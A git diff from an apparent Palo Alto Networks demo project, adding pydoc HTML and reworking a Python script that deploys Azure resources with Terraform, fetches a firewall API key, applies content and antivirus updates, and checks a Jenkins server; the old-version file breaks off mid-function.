b/azure/Jenkins_proj-master/deploy-v2.html new file mode 100644 index 00000000..123a542a --- /dev/null +++ b/azure/Jenkins_proj-master/deploy-v2.html @@ -0,0 +1,185 @@ + +Python: module deploy-v2 + + + + + +
 
+ 
deploy-v2
index
/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py
+

# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

+# Author: Justin Harris jharris@paloaltonetworks.com

+Usage

+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>

+

+ + + + + +
 
+Modules
       
xml.etree.ElementTree
+argparse
+pandevice.firewall
+json
+
logging
+os
+requests
+subprocess
+
sys
+time
+urllib3
+uuid
+
xmltodict
+

+ + + + + +
 
+Classes
       
+
builtins.Exception(builtins.BaseException) +
+
+
DeployRequestException +
+
+
+

+ + + + + + + +
 
+class DeployRequestException(builtins.Exception)
   Common base class for all non-exit exceptions.
 
 
Method resolution order:
+
DeployRequestException
+
builtins.Exception
+
builtins.BaseException
+
builtins.object
+
+
+Data descriptors defined here:
+
__weakref__
+
list of weak references to the object (if defined)
+
+
+Methods inherited from builtins.Exception:
+
__init__(self, /, *args, **kwargs)
Initialize self.  See help(type(self)) for accurate signature.
+ +
__new__(*args, **kwargs) from builtins.type
Create and return a new object.  See help(type) for accurate signature.
+ +
+Methods inherited from builtins.BaseException:
+
__delattr__(self, name, /)
Implement delattr(self, name).
+ +
__getattribute__(self, name, /)
Return getattr(self, name).
+ +
__reduce__(...)
helper for pickle
+ +
__repr__(self, /)
Return repr(self).
+ +
__setattr__(self, name, value, /)
Implement setattr(self, name, value).
+ +
__setstate__(...)
+ +
__str__(self, /)
Return str(self).
+ +
with_traceback(...)
Exception.with_traceback(tb) --
+set self.__traceback__ to tb and return self.
+ +
+Data descriptors inherited from builtins.BaseException:
+
__cause__
+
exception cause
+
+
__context__
+
exception context
+
+
__dict__
+
+
__suppress_context__
+
+
__traceback__
+
+
args
+
+

+ + + + + +
 
+Functions
       
apply_tf(working_dir, vars, description)
Handles terraform operations and returns variables in outputs.tf as a dict.
+:param working_dir: Directory that contains the tf files
+:param vars: Additional variables passed in to override defaults equivalent to -var
+:param description: Description of the deployment for logging purposes
+:return:    return_code - 0 for success or other for failure
+            outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
create_azure_fileshare(share_prefix, account_name, account_key)
Generate a unique share name to avoid overlaps in shared infra
+:param share_prefix:
+:param account_name:
+:param account_key:
+:return:
+
getApiKey(hostname, username, password)
Generates a Paloaltonetworks api key from username and password credentials
+:param hostname: Ip address of firewall
+:param username:
+:param password:
+:return: api_key API key for firewall
+
getFirewallStatus(fwIP, api_key)
+
getServerStatus(IP)
Gets the server status by sending an HTTP request and checking for a 200 response code
+
main(username, password, rg_name, azure_region)
Main function
+:param username:
+:param password:
+:param rg_name: Resource group name prefix
+:param azure_region: Region
+:return:
+
send_request(call)
Handles sending requests to API
+:param call: url
+:return: Retruns result of call. Will return response for codes between 200 and 400.
+         If 200 response code is required check value in response
+
update_fw(fwMgtIP, api_key)
Applies latest AppID, Threat and AV updates to firewall after launch
+:param fwMgtIP: Firewall management IP
+:param api_key: API key
+
update_status(key, value)
For tracking purposes.  Write responses to file.
+:param key:
+:param value:
+:return:
+
walkdict(d, key)
Finds a key in a dict or nested dict and returns the value associated with it
+:param d: dict or nested dict
+:param key: key value
+:return: value associated with key
+
write_status_file(message_dict)
Writes the deployment state to a dict and outputs to file for status tracking
+

+ + + + + +
 
+Data
       formatter = <logging.Formatter object>
+handler = <StreamHandler <stderr> (NOTSET)>
+logger = <RootLogger root (INFO)>
+status_output = {}
+ \ No newline at end of file diff --git a/azure/Jenkins_proj-master/deploy.py b/azure/Jenkins_proj-master/deploy.py index 6be3620b..6328d84e 100644 --- a/azure/Jenkins_proj-master/deploy.py +++ b/azure/Jenkins_proj-master/deploy.py @@ -18,7 +18,7 @@ Usage -python deploy.py -u -p' +python deploy.py --username -p -r -j """ @@ -31,15 +31,19 @@ import time import uuid import xml.etree.ElementTree as ET - +import xmltodict import requests import urllib3 + from azure.common import AzureException from azure.storage.file import FileService + + from pandevice import firewall from python_terraform import Terraform +from collections import OrderedDict + -# from . import cache_utils urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) _archive_dir = './WebInDeploy/bootstrap' @@ -51,19 +55,30 @@ formatter = logging.Formatter('%(levelname)-8s %(message)s') handler.setFormatter(formatter) logger.addHandler(handler) -logger.setLevel(logging.INFO) + # global var to keep status output status_output = dict() def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + try: - r = requests.get(call, verify=False, timeout=5) + r = requests.get(call, headers = headers, verify=False, timeout=5) r.raise_for_status() except requests.exceptions.HTTPError as errh: ''' - Firewall may return 5xx error when rebooting. Need to handle a 5xx response + Firewall may return 5xx error when rebooting. Need to handle a 5xx response ''' logger.debug("DeployRequestException Http Error:") raise DeployRequestException("Http Error:") @@ -83,165 +98,210 @@ def send_request(call): class DeployRequestException(Exception): pass +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ # # Download latest applications and threats + type = "op" cmd = "" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except DeployRequestException: - logger.debug("failed to get jobid this time. Try again") - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - print("Download latest Applications and Threats update - " + str(jobid)) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + completed = 0 - while completed == 0: - time.sleep(10) + while (completed == 0): + time.sleep(45) call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) try: r = send_request(call) - logger.info('Response to show jobs was {}'.format(r.text)) - if 'not found' in r.text: - raise DeployRequestException(r.text) - - except DeployRequestException: + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException logger.debug("failed to get jobid this time. Try again") else: tree = ET.fromstring(r.text) if tree.attrib['status'] == 'success': - - if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP download Complete ") - completed = 1 - else: + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 print("Download latest Applications and Threats update") status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( tree[0][0][12].text) + "% complete" print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 - # Install latest applications and threats without committing - time.sleep(1) + # Install latest content update type = "op" cmd = "latestno" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested content install but got response{}".format(r)) - else: - print("request for content upgrade response was {}".format(r.text)) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Applications and Threats update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': + getjobid = 0 + jobid = '' + key = 'job' + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP install Complete ") + logger.debug("APP+TP Install Complete ") completed = 1 - else: - print("tree value {}".format(tree[0][0][5].text)) - status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) - else: - logger.debug("Unable to schedule install") + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + - # download latest anti-virus update + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' type = "op" cmd = "" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested AV download but got response{}".format(DeployRequestException)) - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid))) + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 completed = 0 while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) r = send_request(call) - tree = ET.fromstring(r.text) logger.debug('Got response for show job {}'.format(r.text)) if tree.attrib['status'] == 'success': - - if (tree[0][0][5].text == 'FIN'): - logger.debug( - "AV download Complete - ") - completed = 1 - else: - status = "AV download Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) - - # install latest anti-virus update without committing - type = "op" - cmd = "latestno" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - logger.debug('Got response for show job {}'.format(r.text)) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Anti-Virus update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - - logger.debug('Got response for show job {}'.format(r.text)) - if tree.attrib['status'] == 'success': - + try: if (tree[0][0][5].text == 'FIN'): - logger.debug("AV install Status Complete ") + logger.info("AV install Status Complete ") completed = 1 else: status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" print('{0}\r'.format(status)) - else: - logger.debug("Unable to schedule install") + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 def getApiKey(hostname, username, password): - ''' - Generate the API key from username / password - ''' + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + print("getting api key") call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) @@ -277,7 +337,6 @@ def getFirewallStatus(fwIP, api_key): :param fwMgtIP: IP Address of firewall interface to be probed :param api_key: Panos API key """ - global gcontext url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) # Send command to fw and see if it times out or we get a response @@ -326,6 +385,12 @@ def getFirewallStatus(fwIP, api_key): def update_status(key, value): + """ + For tracking purposes. Write responses to file. + :param key: + :param value: + :return: + """ global status_output if type(status_output) is not dict: @@ -355,7 +420,13 @@ def write_status_file(message_dict): def create_azure_fileshare(share_prefix, account_name, account_key): - # generate a unique share name to avoid overlaps in shared infra + """ + Generate a unique share name to avoid overlaps in shared infra + :param share_prefix: + :param account_name: + :param account_key: + :return: + """ # FIXME - Need to remove hardcoded directoty link below @@ -407,6 +478,7 @@ def create_azure_fileshare(share_prefix, account_name, account_key): def getServerStatus(IP): """ Gets the server status by sending an HTTP request and checking for a 200 response code + """ global gcontext @@ -414,9 +486,10 @@ def getServerStatus(IP): logger.info('URL request is {}'.format(call)) # Send command to fw and see if it times out or we get a response count = 0 - max_count = 15 + max_count = 12 while True: if count < max_count: + time.sleep(10) try: count = count + 1 r = send_request(call) @@ -430,24 +503,17 @@ def getServerStatus(IP): return 'server_down' -def main(username, password, rg_name): - username = username - password = password - - WebInBootstrap_vars = { - 'RG_Name': rg_name - } - - WebInDeploy_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } +def apply_tf(working_dir, vars, description): - WebInFWConf_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } + """ + Handles terraform operations and returns variables in outputs.tf as a dict. + :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + """ # Set run_plan to TRUE is you wish to run terraform plan before apply run_plan = False kwargs = {"auto-approve": True} @@ -462,40 +528,77 @@ def main(username, password, rg_name): # if capture output is False, then everything will essentially go to stdout and stderrf stderr = sys.stderr stdout = sys.stdout - start_time = time.asctime() - print(f'Starting Deployment at {start_time}\n') + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) # Create Bootstrap - tf = Terraform(working_dir='./WebInBootstrap') + tf = Terraform(working_dir=working_dir) tf.cmd('init') if run_plan: + # print('Calling tf.plan') tf.plan(capture_output=False) - return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output, - skip_plan=True, **kwargs) - resource_group = tf.output('Resource_Group') - bootstrap_bucket = tf.output('Bootstrap_Bucket') - storage_account_access_key = tf.output('Storage_Account_Access_Key') - web_in_bootstrap_output = tf.output() + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) - logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + return (return_code, outputs) - update_status('web_in_deploy_stdout', stdout) - update_status('web_in_bootstrap_output', web_in_bootstrap_output) - if return_code1 != 0: +def main(username, password, rg_name, azure_region): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + + WebInBootstrap_vars = { + 'RG_Name': rg_name, + 'Azure_Region': azure_region + } + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password, + 'Azure_Region': azure_region + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap') + + if return_code == 0: + share_prefix = 'jenkins-demo' + resource_group = outputs['Resource_Group']['value'] + bootstrap_bucket = outputs['Bootstrap_Bucket']['value'] + storage_account_access_key = outputs['Storage_Account_Access_Key']['value'] + update_status('web_in_bootstrap_status', 'success') + else: logger.info("WebInBootstrap failed") update_status('web_in_bootstap_status', 'error') - update_status('web_in_bootstrap_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_bootstrap_status', 'success') - share_prefix = 'jenkins-demo' share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key) @@ -505,46 +608,40 @@ def main(username, password, rg_name): WebInDeploy_vars.update({'Attack_RG_Name': resource_group}) WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name}) + # # Build Infrastructure + # + # - tf = Terraform(working_dir='./WebInDeploy') - # print("vars {}".format(WebInDeploy_vars)) - tf.cmd('init') - if run_plan: - # print('Calling tf.plan') - tf.plan(capture_output=False, var=WebInDeploy_vars) - return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, - **kwargs) + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') - web_in_deploy_output = tf.output() + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) - logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) - update_status('web_in_deploy_stdout', stdout) update_status('web_in_deploy_output', web_in_deploy_output) - if return_code1 != 0: + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value'] + nlbDns = web_in_deploy_output['NLB-DNS']['value'] + fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Internal loadbalancer address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + else: logger.info("WebInDeploy failed") update_status('web_in_deploy_status', 'error') - update_status('web_in_deploy_stderr', stderr) print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_deploy_status', 'success') - - albDns = tf.output('ALB-DNS') - fwMgt = tf.output('MGT-IP-FW-1') - nlbDns = tf.output('NLB-DNS') - fwMgtIP = tf.output('MGT-IP-FW-1') - - logger.info("Got these values from output \n\n") - logger.info("AppGateway address is {}".format(albDns)) - logger.info("Internal loadbalancer address is {}".format(nlbDns)) - logger.info("Firewall Mgt address is {}".format(fwMgt)) # # Check firewall is up and running - # # + # + # api_key = getApiKey(fwMgtIP, username, password) @@ -577,45 +674,29 @@ def main(username, password, rg_name): logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') time.sleep(10) fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) - logger.info("Updating firewall with latest content pack") + + logger.info("Updating firewall with latest content pack") update_fw(fwMgtIP, api_key) # # Configure Firewall # WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) - tf = Terraform(working_dir='./WebInFWConf') - tf.cmd('init') - kwargs = {"auto-approve": True} logger.info("Applying addtional config to firewall") - WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt - - if run_plan: - tf.plan(capture_output=capture_output, var=WebInFWConf_vars) - - # update initial vars with generated fwMgt ip - - return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, - var=WebInFWConf_vars, **kwargs) - - web_in_fw_conf_out = tf.output() + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') - update_status('web_in_fw_conf_output', web_in_fw_conf_out) - # update_status('web_in_fw_conf_stdout', stdout) + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf ok") - logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) - - if return_code2 != 0: - logger.error("WebInFWConf failed") - update_status('web_in_fw_conf_status', 'error') - update_status('web_in_fw_conf_stderr', stderr) + else: + logger.info("WebInFWConf sent return code {}".format(return_code)) + update_status('web_in_deploy_status', 'error') print(json.dumps(status_output)) exit(1) - else: - update_status('web_in_fw_conf_status', 'success') logger.info("Commit changes to firewall") @@ -630,8 +711,6 @@ def main(username, password, rg_name): logger.info('Checking if Jenkins Server is ready') - # FIXME - add outputs for all 3 dirs - res = getServerStatus(albDns) if res == 'server_up': @@ -651,10 +730,12 @@ def main(username, password, rg_name): parser.add_argument('-u', '--username', help='Firewall Username', required=True) parser.add_argument('-p', '--password', help='Firewall Password', required=True) parser.add_argument('-r', '--resource_group', help='Resource Group', required=True) + parser.add_argument('-j', '--azure_region', help='Azure Region', required=True) args = parser.parse_args() username = args.username password = args.password resource_group = args.resource_group + azure_region = args.azure_region - main(username, password, resource_group) + main(username, password, resource_group, azure_region) diff --git a/azure/Jenkins_proj-master/deployold.py b/azure/Jenkins_proj-master/deployold.py new file mode 100644 index 00000000..b2ddb37e --- /dev/null +++ b/azure/Jenkins_proj-master/deployold.py @@ -0,0 +1,628 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py -u -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict + +import requests +import urllib3 +from azure.common import AzureException +from azure.storage.file import FileService +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict + +# from . import cache_utils +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +_archive_dir = './WebInDeploy/bootstrap' +_content_update_dir = './WebInDeploy/content_updates/' + +logging.basicConfig(level=logging.INFO) +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + +# global var to keep status output +status_output = dict() + + +def send_request(call): + + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + + +def listRecursive (d, key): + for k, v in d.items (): + if isinstance (v, OrderedDict): + for found in listRecursive (v, key): + yield found + if k == key: + yield v + +def update_fw(fwMgtIP, api_key): + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid =0 + jobid = '' + key ='job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete " ) + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + else: + logger.info('Unable to determine job status') + + + # install latest anti-virus update without committing + getjobid =0 + jobid = '' + key ='job' + while getjobid == 0: + try: + + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + for found in listRecursive(dict, 'job'): + jobid = found + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(30) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + + else: + logger.info('Unable to determine job status') + + +def getApiKey(hostname, username, password): + ''' + Generate the API key from username / password + ''' + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if 